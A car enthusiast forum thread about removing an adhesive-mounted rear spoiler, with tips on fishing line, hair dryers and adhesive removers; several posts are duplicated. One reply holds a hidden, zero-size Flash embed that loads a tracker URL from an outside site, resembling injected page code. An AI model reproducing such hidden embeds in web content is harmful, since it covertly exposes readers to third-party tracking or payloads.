Rear Spoiler Delete

Malecoda

Feb 3, 2009
Freehold NJ
Hey everyone. Just had a quick question on removing my spoiler. I have an 08 V6 (i know wrong forum, but no one really talks in the v6 forum) and want to take off the spoiler. I tried removing it yesterday, I unbolted the 4 screws holding it there but i guess maybe it has 3M double sided tape on it too. I dont wanna go caveman on it and just try to pull it off and possibly damage the paint underneath. So my main question is, is there anything i can put on there to maybe loosen the adhesive? It seems to be stuck right in the center because i can pull up on the left and right side of the spoiler, just dont want to pull to hard and break it. It doesnt seem to be all that strong and bends quite easy.

Thanks guys!

• Sponsors (?)

May sound a little strange, but fishing line cuts right through. You'll need some Goo Gone, Goof Off, or 3M Adhesive Remover to take the sticky bits off your paint though.

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>May sound a little strange, but fishing line cuts right through. You'll need some Goo Gone, Goof Off, or 3M Adhesive Remover to take the sticky bits off your paint though.

If you have this one, good luck. I took this type off my car using fishing string. I jacked up the truck pretty good. The good thing is the fin I replaced it with convered the mess I made.

photo.jpg

If you have this one, good luck. I took this type off my car using fishing string. I jacked up the truck pretty good. The good thing is the fin I replaced it with convered the mess I made.

photo.jpg

Yea thats the exact one i got... :rolleyes: Im gunna try the fishing string. Worst case if it ends up getting messed up ill just put it back on. Wish me luck!! Thanks everyone

I found that heating the area around were the adhesive is with a hair dryer (not a heat gun, that will burn the paint) to the point were it is hot to the touch will allow the adhesive to stretch and pull away leaving no marks. Be careful though as the adhesive could stretch and suddenly release all at once. This happen to me. I heated the adhesive and was applying a steady pull with a good mount of force and as the spoiler was lifting away from the trunk lid (about a 1/4") and suddenly let go sending me flying across the garage in some kind of drunken sailor dance trying not to let the spoiler go through the garage window. My wife thought is was real funny!

I found that heating the area around were the adhesive is with a hair dryer (not a heat gun, that will burn the paint) to the point were it is hot to the touch will allow the adhesive to stretch and pull away leaving no marks. Be careful though as the adhesive could stretch and suddenly release all at once. This happen to me. I heated the adhesive and was applying a steady pull with a good mount of force and as the spoiler was lifting away from the trunk lid (about a 1/4") and suddenly let go sending me flying across the garage in some kind of drunken sailor dance trying not to let the spoiler go through the garage window. My wife thought is was real funny!

Hahaha thanks for the heads up.:nice:

... sending me flying across the garage in some kind of drunken sailor dance trying not to let the spoiler go through the garage window. My wife thought is was real funny!

:rlaugh::rlaugh: That visual is hilarious!!!

Important thing is to take your time. Fishing line works but can fubar any surface thats not metal. I jacked my truck hood.:notnice: Goo gone, wd 40 and a hair dryer and good methods.

patrick

do it do it! I took mine off and welded the holes and i couldn't be happier.
Hairdryer is your best friend here.

from this (blehhhh)
DSC06812.jpg

to this (Sweeeeeeet)
4.jpg

(that picture is from when the holes were just plugged (before i welded))